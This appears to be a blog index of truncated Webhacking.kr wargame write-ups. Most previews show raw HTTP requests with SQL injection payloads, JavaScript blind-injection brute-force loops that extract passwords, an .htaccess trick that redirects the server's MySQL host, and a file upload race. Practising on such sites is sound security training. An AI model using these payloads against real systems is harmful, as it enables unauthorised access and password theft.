
Hacking/Webhacking.kr (spoiler warning)

(42)
Webhacking.kr 29
    POST /challenge/web/web-14/index.php HTTP/1.1
    Host: webhacking.kr
    Proxy-Connection: keep-alive
    Content-Length: 262
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://webhacking.kr
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
    HTTPS: 1
    Content-Type:..
Webhacking.kr 35
    GET /challenge/web/web-17/index.php?phone=1),(char(97,100,109,105,110),char(49,50,53,46,49,51,49,46,49,56,57,46,54,49),1 HTTP/1.1
    Host: webhacking.kr
    Proxy-Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
    HTTPS: 1..
Webhacking.kr 45
    This is a Blind SQL Injection challenge.
    time=1 and (select length(Password) from FreeB0aRd)=9
    The table name is exposed on the page; the column name is
    dictionary = "0123456789abcdefghijklmnopqrstuvwxyz_";
    password = "";
    function go(query,n) {
        query = "0 or (select ascii(substr(Password,"+n+",1)) from FreeB0aRd)="+query;
        document.cookie="time="+query; // put the SQL injection query into the time cookie
        console.log(query);
        x = new XMLHttpRequest();
        x.open("GET","inde..
blind sql injection
    dictionary = "abcdefghijklmnopqrstuvwxyz0123456789_"; // characters assumed to make up the password
    password = ""; // variable that stores the recovered password
    function go(query,n) // query = ASCII code of the candidate character, n = substr position
    {
        query = "2 and ascii(substr(pw,"+n+",1))="+query; // compares the password of no 2 one byte at a time
        console.log(query); // print brute-force progress to the browser console
        x = new XMLHttpRequest(); // create the object used to send the request
        x.open("GET","index.php?no="+query,fa..
Webhacking.kr 45
    GET /challenge/web/web-22/index.php?id=%aa'%09or%09id%3d%090x61646d696e%23&pw=guest HTTP/1.1
    Host: webhacking.kr
    Proxy-Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
    HTTPS: 1
    Referer: http://webhacking.kr/challen..
Webhacking.kr 30
    This challenge is about getting the web server to load its default information through an .htaccess file.
    php_admin_value mysql.default_host "my IP address"
    php_admin_value mysql.default_user "a"
    php_admin_value mysql.default_password "a"
Webhacking.kr 37
    If, after the file corresponding to the timestamp has been created, the file uploaded by the user is created and overwrites it
    http://webhacking.kr/challenge/web/web-18/index.phps
    POST /challenge/web/web-18/index.php HTTP/1.1
    Host: webhacking.kr
    Proxy-Connection: keep-alive
    Content-Length: 201
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://webhacking.kr
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_..
Webhacking.kr 61
    This challenge is about changing a column name. Because of magic_quotes_gpc, the input is given in hex.
    0x61646d696e
    0x61646d696e as id